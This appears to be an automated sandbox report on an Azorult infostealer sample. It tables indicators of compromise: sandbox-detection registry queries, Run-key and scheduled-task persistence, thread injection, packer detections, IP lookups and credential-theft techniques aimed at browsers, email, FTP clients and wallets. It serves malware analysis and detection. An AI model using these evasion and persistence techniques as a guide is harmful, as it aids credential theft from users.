azorult | 3dc2b16c3c1de6e2b5408c3ed68b9ef245afc298b91bb74af9368186e89e3e8b

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mb0_19reA3ek_FaXLGDn1PTP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TtArTDLsM_MA5QGorM8pLO_d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TXekn4yWdozLHwdhDSQH_ibp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MSI31A1.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TtArTDLsM_MA5QGorM8pLO_d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vTxCK9akzifa43q2c5tDpQ7t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_DZTHL2I9hYYhHVgbL_Sy2Ss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8078852.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MSI31A1.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1392307.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1392307.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6169197.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6169197.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mb0_19reA3ek_FaXLGDn1PTP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TXekn4yWdozLHwdhDSQH_ibp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vTxCK9akzifa43q2c5tDpQ7t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_DZTHL2I9hYYhHVgbL_Sy2Ss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8078852.exe

Loads dropped DLL 5 IoCs

pid	Process
664	rundll32.exe
5176	E_5MA2Hw9brEnaU0wQL2T5Zb.exe
5176	E_5MA2Hw9brEnaU0wQL2T5Zb.exe
5176	E_5MA2Hw9brEnaU0wQL2T5Zb.exe
7000	regsvr32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000300000002b1df-277.dat	themida
behavioral2/files/0x000300000002b1df-287.dat	themida
behavioral2/files/0x000e00000002b1fc-385.dat	themida
behavioral2/files/0x000e00000002b1fc-388.dat	themida
behavioral2/files/0x000100000002b244-421.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	W5FhvjC37Q0Te68Egl2YSMn1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2905909.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	W5FhvjC37Q0Te68Egl2YSMn1.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	KpN3P7O4swhPu0gW9n9rco_F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	KpN3P7O4swhPu0gW9n9rco_F.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 10 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1392307.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mb0_19reA3ek_FaXLGDn1PTP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_DZTHL2I9hYYhHVgbL_Sy2Ss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MSI31A1.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6169197.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TXekn4yWdozLHwdhDSQH_ibp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TtArTDLsM_MA5QGorM8pLO_d.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vTxCK9akzifa43q2c5tDpQ7t.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8078852.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\P:	MSIEXEC.EXE
File opened (read-only)	\??\R:	MSIEXEC.EXE
File opened (read-only)	\??\S:	MSIEXEC.EXE
File opened (read-only)	\??\T:	MSIEXEC.EXE
File opened (read-only)	\??\A:	MSIEXEC.EXE
File opened (read-only)	\??\E:	MSIEXEC.EXE
File opened (read-only)	\??\M:	MSIEXEC.EXE
File opened (read-only)	\??\O:	MSIEXEC.EXE
File opened (read-only)	\??\U:	MSIEXEC.EXE
File opened (read-only)	\??\Y:	MSIEXEC.EXE
File opened (read-only)	\??\Z:	MSIEXEC.EXE
File opened (read-only)	\??\W:	MSIEXEC.EXE
File opened (read-only)	\??\G:	MSIEXEC.EXE
File opened (read-only)	\??\L:	MSIEXEC.EXE
File opened (read-only)	\??\Q:	MSIEXEC.EXE
File opened (read-only)	\??\V:	MSIEXEC.EXE
File opened (read-only)	\??\Z:	keygen-pr.exe
File opened (read-only)	\??\I:	MSIEXEC.EXE
File opened (read-only)	\??\J:	MSIEXEC.EXE
File opened (read-only)	\??\N:	MSIEXEC.EXE
File opened (read-only)	\??\X:	MSIEXEC.EXE
File opened (read-only)	\??\B:	MSIEXEC.EXE
File opened (read-only)	\??\F:	MSIEXEC.EXE
File opened (read-only)	\??\H:	MSIEXEC.EXE
File opened (read-only)	\??\K:	MSIEXEC.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
46	ipinfo.io
82	ipinfo.io
117	ipinfo.io
142	ipinfo.io
2	ip-api.com
27	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2440	1392307.exe
4268	6169197.exe
568	TXekn4yWdozLHwdhDSQH_ibp.exe
5388	mb0_19reA3ek_FaXLGDn1PTP.exe
5540	TtArTDLsM_MA5QGorM8pLO_d.exe
5452	vTxCK9akzifa43q2c5tDpQ7t.exe
5548	_DZTHL2I9hYYhHVgbL_Sy2Ss.exe
5480	8078852.exe
3496	MSI31A1.tmp

Suspicious use of SetThreadContext 29 IoCs

description	pid	Process	procid_target
PID 5108 set thread context of 4856	5108	key.exe	92
PID 4568 set thread context of 3068	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	191
PID 5168 set thread context of 5568	5168	Py5oC1Ysh1XrAkVX9HhYrYwe.exe	200
PID 960 set thread context of 4948	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	193
PID 4568 set thread context of 4648	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	201
PID 960 set thread context of 1440	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	204
PID 5380 set thread context of 3796	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	214
PID 4568 set thread context of 2908	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	224
PID 5380 set thread context of 5248	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	450
PID 4568 set thread context of 5432	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	245
PID 5380 set thread context of 5052	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	246
PID 960 set thread context of 2808	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	247
PID 5380 set thread context of 1912	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	251
PID 4568 set thread context of 1084	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	252
PID 960 set thread context of 1304	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	260
PID 5380 set thread context of 5156	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	256
PID 4568 set thread context of 6132	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	257
PID 960 set thread context of 2084	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	265
PID 5380 set thread context of 1088	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	266
PID 4568 set thread context of 2232	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	267
PID 960 set thread context of 5316	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	272
PID 5064 set thread context of 2784	5064	1.exe	270
PID 5380 set thread context of 3948	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	274
PID 5380 set thread context of 6804	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	286
PID 4568 set thread context of 6884	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	287
PID 960 set thread context of 6960	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	288
PID 5380 set thread context of 5764	5380	rTRyd7x1uj50ESePTCQIZvSL.exe	292
PID 4568 set thread context of 5360	4568	ib8S9xpfy_MPp0J5lz7SFyDD.exe	293
PID 960 set thread context of 1092	960	tYLCyuHWzjduCUNrqPcUO6gH.exe	294

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	gRvcl6kklMo5wkZo2pzOuXAV.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	gRvcl6kklMo5wkZo2pzOuXAV.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	r0HOo1H0DjG_3iBDYXsGJmLf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	r0HOo1H0DjG_3iBDYXsGJmLf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	r0HOo1H0DjG_3iBDYXsGJmLf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	r0HOo1H0DjG_3iBDYXsGJmLf.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	r0HOo1H0DjG_3iBDYXsGJmLf.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	keygen-step-3.exe
File opened for modification	C:\Windows\winnetdriv.exe	keygen-step-3.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 39 IoCs

pid	pid_target	Process	procid_target
5052	664	WerFault.exe	106
1032	4848	WerFault.exe	102
584	3184	WerFault.exe	115
880	3956	WerFault.exe	113
1252	1652	WerFault.exe	118
3136	1400	WerFault.exe	126
4152	3296	WerFault.exe	130
5252	4948	WerFault.exe	193
4856	5396	WerFault.exe	158
4184	5404	WerFault.exe	157
2960	1196	WerFault.exe	87
1092	5128	WerFault.exe	145
6368	5064	WerFault.exe	182
6432	2232	WerFault.exe	267
5044	1916	WerFault.exe	261
7716	1296	WerFault.exe	209
2400	1296	WerFault.exe	209
7776	7844	WerFault.exe	319
8028	5436	WerFault.exe	234
236	132	WerFault.exe	357
3244	7836	WerFault.exe	362
5744	8960	WerFault.exe	423
4556	8420	WerFault.exe	421
5248	8984	WerFault.exe	433
12140	4484	WerFault.exe	469
9448	6160	WerFault.exe	463
7140	10660	WerFault.exe	529
13492	11576	WerFault.exe	499
12556	11576	WerFault.exe	499
11520	6160	WerFault.exe	463
15180	6404	WerFault.exe	582
14868	17068	WerFault.exe	657
12024	15364	WerFault.exe	692
19796	10648	WerFault.exe	753
3272	9784	WerFault.exe	856
25024	23404	WerFault.exe	879
21676	4032	WerFault.exe	186
7284	8316	WerFault.exe	1042
19848	13132	WerFault.exe	1069

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Py5oC1Ysh1XrAkVX9HhYrYwe.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Py5oC1Ysh1XrAkVX9HhYrYwe.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Py5oC1Ysh1XrAkVX9HhYrYwe.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
496	schtasks.exe
2904	schtasks.exe
5468	schtasks.exe
4624	schtasks.exe
6444	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
8080	timeout.exe

Enumerates system info in registry 2 TTPs 28 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Mie.exe.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	tYLCyuHWzjduCUNrqPcUO6gH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Mie.exe.com
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
872	taskkill.exe

Modifies data under HKEY_USERS 40 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
